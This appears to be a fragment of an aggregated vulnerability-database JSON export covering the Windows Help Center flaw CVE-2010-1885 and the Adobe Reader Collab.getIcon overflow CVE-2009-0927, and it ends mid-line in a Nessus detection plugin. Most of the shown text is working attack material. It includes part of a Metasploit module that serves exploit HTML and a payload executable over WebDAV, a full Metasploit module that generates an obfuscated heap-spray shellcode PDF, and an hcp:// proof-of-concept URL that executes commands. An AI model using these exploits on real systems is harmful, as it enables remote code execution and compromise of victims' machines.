\"o.openPlayer(asx);\" \nwhen \"iframe\" \nmech = \"launchiframe(ifr);\" \nwhen \"none\" \nmech = \"\" \nelse \nmech = \"\" \nend \n \nhtml.gsub!(/JAVASCRIPTFU/, js) \nhtml.gsub!(/DIALOGMECH/, mech) \nhtml.gsub!(/URLBASE/, @url_base) \nhtml.gsub!(/ASXFILE/, @random_dir + \"/\" + @asx_file) \nhtml.gsub!(/IFRFILE/, @random_dir + \"/\" + @start_help) \n \nprint_status(\"Sending exploit html to #{cli.peerhost}:#{cli.peerport} ...\") \n \nheaders = { \n'Content-Type' => 'text/html', \n#'X-UA-Compatible' => 'IE=7' \n} \n \nsend_response(cli, html, headers) \nend \n \n# \n# OPTIONS requests sent by the WebDav Mini-Redirector \n# \ndef process_options(cli, request) \nprint_status(\"Responding to WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}\") \nheaders = { \n#'DASL' => '<DAV:sql>', \n#'DAV' => '1, 2', \n'Allow' => 'OPTIONS, GET, PROPFIND', \n'Public' => 'OPTIONS, GET, PROPFIND' \n} \nsend_response(cli, '', headers) \nend \n \ndef convert_to_char_code(str) \nreturn str.unpack('H*')[0].gsub(Regexp.new(\".{#{2}}\", nil, 'n')) { |s| s.hex.to_s + \",\" }.chop \nend \n# \n# PROPFIND requests sent by the WebDav Mini-Redirector \n# \ndef process_propfind(cli, request) \npath = request.uri \nprint_status(\"Received WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport}\") \nbody = '' \n \nif (Regexp.new(Regexp.escape(@payload)+'$', true).match(path)) \n# Response for the EXE \nprint_status(\"Sending EXE multistatus for #{path} ...\") \n#<lp1:getcontentlength>45056</lp1:getcontentlength> \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> \n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> \n<lp1:getetag>\"39e0132-b000-43c6e5f8d2f80\"</lp1:getetag> \n<lp2:executable>F</lp2:executable> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \nelsif (path =~ /\\.manifest$/i) or (path =~ /\\.config$/i) or (path =~ /\\.exe/i) \nprint_status(\"Sending 404 for #{path} ...\") \nsend_not_found(cli) \nreturn \n \nelsif (path =~ /\\/$/) or (not path.sub('/', '').index('/')) \n# Response for anything else (generally just /) \nprint_status(\"Sending directory multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> \n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> \n<lp1:getetag>\"39e0001-1000-4808c3ec95000\"</lp1:getetag> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n \nelse \nprint_status(\"Sending 404 for #{path} ...\") \nsend_not_found(cli) \nreturn \nend \n \n# send the response \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nend \n \ndef exploit \n@random_dir = rand_text_alpha(rand(2)+1) \n@asx_file = rand_text_alpha(rand(2)+1) + \".asx\" \n@start_help = rand_text_alpha(rand(2)+1) + \".html\" \n@payload = rand_text_alpha(rand(2)+1) + \".exe\" \n@img_file = rand_text_alpha(rand(2)+1) + \".gif\" \n \nif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' \nraise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' \nend \n \nsuper \nend \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/91768/ms10_042_helpctr_xss_cmd_exec.rb.txt"}, {"lastseen": "2016-12-05T22:21:36", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Adobe Collab.getIcon() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83139", "href": "https://packetstormsecurity.com/files/83139/Adobe-Collab.getIcon-Buffer-Overflow.html", "sourceData": "`### \n## This file is part of the Metasploit Framework and may be subject to \n## redistribution and commercial restrictions. Please see the Metasploit \n## Framework web site for more information on licensing and terms of use. \n## http://metasploit.com/framework/ \n### \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe Collab.getIcon() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional \n< 8.1.4. By creating a specially crafted pdf that a contains malformed Collab.getIcon() \ncall, an attacker may be able to execute arbitrary code. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>', \n'jduck <metasploit[at]qoop.org>', ], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2009-0927' ], \n[ 'OSVDB', '53647' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-014/' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Adobe Reader v8.1.4 (Windows XP SP3 English)', { 'Ret' => '' } ], \n], \n'DisclosureDate' => 'Mar 24 2009', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), \n], self.class) \n \nend \n \ndef exploit \n# Encode the shellcode. \nshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) \n \n# Make some nops \nnops = Rex::Text.to_unescape(make_nops(4)) \n \n# Randomize variables \nrand1 = rand_text_alpha(rand(100) + 1) \nrand2 = rand_text_alpha(rand(100) + 1) \nrand3 = rand_text_alpha(rand(100) + 1) \nrand4 = rand_text_alpha(rand(100) + 1) \nrand5 = rand_text_alpha(rand(100) + 1) \nrand6 = rand_text_alpha(rand(100) + 1) \nrand7 = rand_text_alpha(rand(100) + 1) \nrand8 = rand_text_alpha(rand(100) + 1) \nrand9 = rand_text_alpha(rand(100) + 1) \nrand10 = rand_text_alpha(rand(100) + 1) \nrand11 = rand_text_alpha(rand(100) + 1) \nrand12 = rand_text_alpha(rand(100) + 1) \n \nscript = %Q| \nvar #{rand1} = unescape(\"#{shellcode}\"); \nvar #{rand2} =\"\"; \nfor (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{nops}\"); \n#{rand4} = #{rand2} + #{rand1}; \n#{rand5} = unescape(\"#{nops}\"); \n#{rand6} = 20; \n#{rand7} = #{rand6}+#{rand4}.length \nwhile (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5}; \n#{rand8} = #{rand5}.substring(0, #{rand7}); \n#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7}); \nwhile(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8}; \n#{rand10} = new Array(); \nfor (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4}; \nvar #{rand12} = unescape(\"%09\"); \nwhile(#{rand12}.length < 0x4000) #{rand12}+=#{rand12}; \n#{rand12} = \"N.\"+#{rand12}; \nCollab.getIcon(#{rand12}); \n| \n \n# Create the pdf \npdf = make_pdf(script) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \n \nfile_create(pdf) \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \ndef make_pdf(js) \n \nxref = [] \neol = \"\\x0d\\x0a\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? \npdf = \"%%PDF-%d.%d\" % [1 + rand(2), 1 + rand(5)] << eol \npdf << \"%\" << RandomNonASCIIString(4) << eol \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj \nxref << pdf.length \npdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj \nxref << pdf.length \npdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << endobj \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \npdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \npdf << \"%%EOF\" << eol \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83139/adobe_geticon.rb.txt"}], "seebug": [{"lastseen": "2017-11-19T18:10:37", "description": "BUGTRAQ ID: 40725,40721\r\nCVE ID: CVE-2010-1885\r\n\r\nWindows\u662f\u5fae\u8f6f\u53d1\u5e03\u7684\u975e\u5e38\u6d41\u884c\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nWindows\u4e2d\u9ed8\u8ba4\u63d0\u4f9b\u4e86\u5e2e\u52a9\u548c\u652f\u6301\u4e2d\u5fc3\u4ee5\u8bbf\u95ee\u5728\u7ebf\u6587\u6863\uff0c\u53ef\u901a\u8fc7hcp://\u5f62\u5f0f\u7684URL\u76f4\u63a5\u8bbf\u95ee\u5e2e\u52a9\u6587\u6863\u3002\u5728\u901a\u8fc7\u6ce8\u518c\u7684\u534f\u8bae\u5904\u7406\u5668\u8c03\u7528hcp:// URL\u65f6\uff0c\u4f1a\u5411\u5e2e\u52a9\u4e2d\u5fc3\u5e94\u7528\u4f20\u9001\u547d\u4ee4\u884c\u53c2\u6570/fromhcp\uff0c\u8fd9\u4e2a\u6807\u8bb0\u5c06\u5e2e\u52a9\u4e2d\u5fc3\u5207\u6362\u5230\u53d7\u9650\u5236\u7684\u6a21\u5f0f\uff0c\u4ec5\u5141\u8bb8\u767d\u540d\u5355\u4e2d\u7684\u5e2e\u52a9\u6587\u6863\u548c\u53c2\u6570\u3002\u4f46\u8fd9\u4e2a\u767d\u540d\u5355\u5b9e\u73b0\u5e76\u4e0d\u5b89\u5168\uff0c\u53ef\u80fd\u88ab\u7ed5\u8fc7\u3002\r\n\r\n\u5728\u8fdb\u884c\u9a8c\u8bc1\u4e4b\u524d\u9996\u5148\u8981\u4f7f\u7528MPC::HTML::UrlUnescapeW()\u51fd\u6570\u89c4\u8303\u5316\u548c\u8f6c\u4e49URL\uff0c\u8be5\u51fd\u6570\u4f7f\u7528MPC::HexToNum()\u5c06 URL\u8f6c\u4e49\u5e8f\u5217\u7ffb\u8bd1\u4e3a\u539f\u59cb\u5b57\u7b26\u3002\u76f8\u5173\u4ee3\u7801\u5982\u4e0b\uff1a\r\n\r\n.text:0106684C Unescape:\r\n.text:0106684C cmp di, '%' ; di contains the current wchar in the input URL.\r\n.text:01066850 jnz short LiteralChar ; if this is not a '%', it must be a literal character.\r\n.text:01066852 push esi ; esi contains a pointer to the current position in URL to unescape.\r\n.text:01066853 call ds:wcslen ; find the remaining length.\r\n.text:01066859 cmp word ptr [esi], 'u' ; if the next wchar is 'u', this is a unicode escape and I need 4 xdigits.\r\n.text:0106685D pop ecx ; this sequence calculates the number of wchars needed (4 or 2).\r\n.text:0106685E setz cl ; i.e. %uXXXX (four needed), or %XX (two needed).\r\n.text:01066861 mov dl, cl\r\n.text:01066863 neg dl\r\n.text:01066865 sbb edx, edx\r\n.text:01066867 and edx, 3\r\n.text:0106686A inc edx\r\n.text:0106686B inc edx\r\n.text:0106686C cmp eax, edx ; test if I have enough characters in input to decode.\r\n.text:0106686E jl short LiteralChar ; if not enough, this '%' is considered literal.\r\n.text:01066870 test cl, cl\r\n.text:01066872 movzx eax, word ptr [esi+2]\r\n.text:01066876 push eax\r\n.text:01066877 jz short NotUnicode\r\n.text:01066879 call HexToNum ; call MPC::HexToNum() to convert this nibble (4 bits) to an integer.\r\n.text:0106687E mov edi, eax ; edi contains the running total of the value of this escape sequence.\r\n.text:01066880 movzx eax, word ptr [esi+4]\r\n.text:01066884 push eax\r\n.text:01066885 shl edi, 4 ; shift edi left 4 positions to make room for the next digit, i.e. total <<= 4;\r\n.text:01066888 call HexToNum\r\n.text:0106688D or edi, eax ; or the next value into the 4-bit gap, i.e. total |= val.\r\n.text:0106688F movzx eax, word ptr [esi+6]; this process continues for the remaining wchars.\r\n.text:01066893 push eax\r\n.text:01066894 shl edi, 4\r\n.text:01066897 call HexToNum\r\n.text:0106689C or edi, eax\r\n.text:0106689E movzx eax, word ptr [esi+8]\r\n.text:010668A2 push eax\r\n.text:010668A3 shl edi, 4\r\n.text:010668A6 call HexToNum\r\n.text:010668AB or edi, eax\r\n.text:010668AD add esi, 0Ah ; account for number of bytes (not chars) consumed by the escape.\r\n.text:010668B0 jmp short FinishedEscape\r\n.text:010668B2\r\n.text:010668B2 NotUnicode:\r\n.text:010668B2 call HexToNum ; this is the same code, but for non-unicode sequences (e.g. %41, instead of %u0041)\r\n.text:010668B7 mov edi, eax\r\n.text:010668B9 movzx eax, word ptr [esi]\r\n.text:010668BC push eax\r\n.text:010668BD call HexToNum\r\n.text:010668C2 shl eax, 4\r\n.text:010668C5 or edi, eax\r\n.text:010668C7 add esi, 4 ; account for number of bytes (not chars) consumed by the escape.\r\n.text:010668CA\r\n.text:010668CA FinishedEscape:\r\n.text:010668CA test di, di\r\n.text:010668CD jz short loc_10668DA\r\n.text:010668CF\r\n.text:010668CF LiteralChar:\r\n.text:010668CF push edi ; append the final value to the normalised string using a std::string append.\r\n.text:010668D0 mov ecx, [ebp+unescaped]\r\n.text:010668D3 push 1\r\n.text:010668D5 call std::string::append\r\n.text:010668DA mov di, [esi] ; fetch the next input character.\r\n.text:010668DD test di, di ; have we reached the NUL terminator?\r\n.text:010668E0 jnz Unescape ; process next char.\r\n\r\nMPC::HexToNum()\u5904\u7406\u51fa\u9519\u60c5\u51b5\u7684\u65b9\u5f0f\u5b58\u5728\u9519\u8bef\uff0c\u76f8\u5173\u4ee3\u7801\u5982\u4e0b\uff1a\r\n\r\n.text:0102D32A mov edi, edi\r\n.text:0102D32C push ebp\r\n.text:0102D32D mov ebp, esp ; function prologue.\r\n.text:0102D32F mov eax, [ebp+arg_0] ; fetch the character to convert.\r\n.text:0102D332 cmp eax, '0'\r\n.text:0102D335 jl short CheckUppercase ; is it a digit?\r\n.text:0102D337 cmp eax, '9'\r\n.text:0102D33A jg short CheckUppercase\r\n.text:0102D33C add eax, 0FFFFFFD0h ; atoi(), probably written val - '0' and optimised by compiler.\r\n.text:0102D33F jmp short Complete\r\n.text:0102D341 CheckUppercase:\r\n.text:0102D341 cmp eax, 'A'\r\n.text:0102D344 jl short CheckLowercase ; is it an uppercase xdigit?\r\n.text:0102D346 cmp eax, 'F'\r\n.text:0102D349 jg short CheckLowercase\r\n.text:0102D34B add eax, 0FFFFFFC9h ; atoi()\r\n.text:0102D34E jmp short Complete\r\n.text:0102D350 CheckLowercase:\r\n.text:0102D350 cmp eax, 'a'\r\n.text:0102D353 jl short Invalid ; lowercase xdigit?\r\n.text:0102D355 cmp eax, 'f'\r\n.text:0102D358 jg short Invalid\r\n.text:0102D35A add eax, 0FFFFFFA9h ; atoi()\r\n.text:0102D35D jmp short Complete\r\n.text:0102D35F Invalid:\r\n.text:0102D35F or eax, 0FFFFFFFFh ; invalid character, return -1\r\n.text:0102D362 Complete:\r\n.text:0102D362 pop ebp\r\n.text:0102D363 retn 4\r\n\r\nMPC::HTML::UrlUnescapeW()\u6ca1\u6709\u6309\u7167\u9700\u6c42\u68c0\u67e5MPC::HexToNum()\u7684\u8fd4\u56de\u4ee3\u7801\uff0c\u56e0\u6b64\u53ef\u80fd\u5411std::strings\u9644\u52a0\u5185\u5bb9\uff0c\u4e4b\u540e\u53ef\u4ee5\u5229\u7528\u4ee3\u7801\u4e2d\u7684\u8ba1\u7b97\u9519\u8bef\u7ed5\u8fc7/fromhcp\u767d\u540d\u5355\u3002\r\n\r\n\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u4f7f\u7528\u7279\u5236\u7684hcp:// URL\u6253\u5f00sysinfomain.htm\u5e2e\u52a9\u6587\u6863\u65f6\u7684\u8f93\u5165\u9a8c\u8bc1\u9519\u8bef\u6765\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\n\nMicrosoft Windows XP SP3\r\nMicrosoft Windows XP SP2\r\nMicrosoft Windows Server 2003 SP2\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u6682\u65f6\u53bb\u9664HCP\u534f\u8bae\u7684\u6ce8\u518c\r\n\r\n \u5728\u547d\u4ee4\u7a97\u53e3\u4e2d\u6267\u884c\uff1a\r\n \r\n reg export HKEY_CLASSES_ROOT\\HCP hcp_backup.reg\r\n \r\n \u5907\u4efd\u6ce8\u518c\u8868\u4e2d\u76f8\u5173\u7684\u8868\u9879\u5230\u5907\u4efd\u6587\u4ef6\u3002\r\n \r\n \u7136\u540e\u6267\u884c\uff1a\r\n \r\n reg delete HKEY_CLASSES_ROOT\\HCP /f\r\n \r\n \u5220\u9664\u76f8\u5173\u7684\u6ce8\u518c\u8868\u9879\u53bb\u9664\u7cfb\u7edf\u7684HCP\u534f\u8bae\u6ce8\u518c\u3002\u5728\u5fae\u8f6f\u53d1\u5e03\u7684\u76f8\u5173\u6f0f\u6d1e\u8865\u4e01\u5b89\u88c5\u4ee5\u540e\uff0c\u53cc\u51fb\u5907\u4efd\u51fa\u6765\u7684hcp_backup.reg\u6587\u4ef6\u5bfc\u5165\u6570\u636e\u5230\u6ce8\u518c\u8868\u540e\u5373\u53ef\u6062\u590d\u5bf9HCP\u7684\u652f\u6301\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\n\r\nhttp://www.microsoft.com/technet/security/", "published": "2010-06-12T00:00:00", "type": "seebug", "title": "Microsoft Windows\u5e2e\u52a9\u548c\u652f\u6301\u4e2d\u5fc3\u7ed5\u8fc7\u767d\u540d\u5355\u9650\u5236\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "modified": "2010-06-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19788", "id": "SSV:19788", "sourceData": "\n hcp://services/search?query=anything&amp;topic=hcp://system/sysinfo/sysinfomain.htm%\r\nA%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%\r\n%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A\r\n%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%\r\nA%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3\r\nCscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%\r\n3C/script%3E\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19788", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:37:59", "description": "No description provided by source.", "published": "2009-09-04T00:00:00", "title": "Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2009-09-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-12196", "id": "SSV:12196", "sourceData": "\n #!/usr/bin/env python\r\n#\r\n# *** Acrobat Reader - Collab getIcon universal exploiter ***\r\n# evil_pdf.py, tested on Operating Systems:\r\n# Windows XP SP3 English/French\r\n# Windows 2003 SP2 English\r\n# with Application versions:\r\n# Adobe Reader 9.0.0/8.1.2 English/French\r\n# Test methods:\r\n# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7\r\n# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.\r\n# [Coromputer] raised from the ashes.\r\n#\r\n\r\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\r\nback: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12196"}, {"lastseen": "2017-11-19T14:03:09", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66863", "id": "SSV:66863", "sourceData": "\n #!/usr/bin/env python\r\n#\r\n# *** Acrobat Reader - Collab getIcon universal exploiter ***\r\n# evil_pdf.py, tested on Operating Systems:\r\n# Windows XP SP3 English/French\r\n# Windows 2003 SP2 English\r\n# with Application versions:\r\n# Adobe Reader 9.0.0/8.1.2 English/French\r\n# Test methods:\r\n# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7\r\n# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.\r\n# [Coromputer] raised from the ashes.\r\n#\r\n\r\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\r\nhttp://exploit-db.com/sploits/2009-CVE-2009-0927_package.zip\r\n\r\n# milw0rm.com [2009-09-03]\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-66863"}], "nessus": [{"lastseen": "2020-09-14T18:30:44", "description": "The Windows Help and Support Center does not properly validate HCP\nURLs, which are associated normally with the Windows Help and Support\nCenter.\n\nIf an attacker can trick a user on the affected host into viewing a\nspecially crafted web page or clicking on a specially crafted link in\nan email message, he can leverage this issue to execute arbitrary\ncode subject to the user's privileges.", "edition": 23, "published": "2010-07-13T00:00:00", "title": "MS10-042: Vulnerability in Help and Support Center Could Allow Remote Code Execution (2229593)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1885"], "modified": "2010-07-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS10-042.NASL", "href": "https://www.tenable.com/plugins/nessus/47710", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(47710);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/05\");\n\n script_cve_id(\"CVE-2010-1885\");\n script_bugtraq_id(40725);\n script_xref(name:\"CERT\", value:\"578319\");\n script_xref(name:\"EDB-ID\", value:\"13808\");\n script_xref(name:\"IAVA\", value:\"2010-A-0095-S\");\n script_xref(name:\"MSFT\", value:\"MS10-042\");\n script_xref(name:\"MSKB\", value:\"2229593\");\n\n script_name(english:\"MS10-042: Vulnerability in Help and Support Center Could Allow Remote Code Execution (2229593)\");\n script_summary(english:\"Checks version of Helpsvc.exe\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"It is possible to execute arbitrary code on the remote Windows host\nthrough the Windows Help and Support Center feature.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows Help and Support Center does not properly validate HCP\nURLs, which are associated normally with the Windows Help and Support\nCenter.\n\nIf an attacker can trick a user on the affected host into viewing a\nspecially crafted web page or clicking on a specially crafted link in\nan email message, he can leverage this issue to execute arbitrary\ncode subject to the user's privileges.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-042\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?da3bd311\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows XP and 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-1885\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Help Center XSS and Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-042';\nkbs = make_list(\"2229593\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, 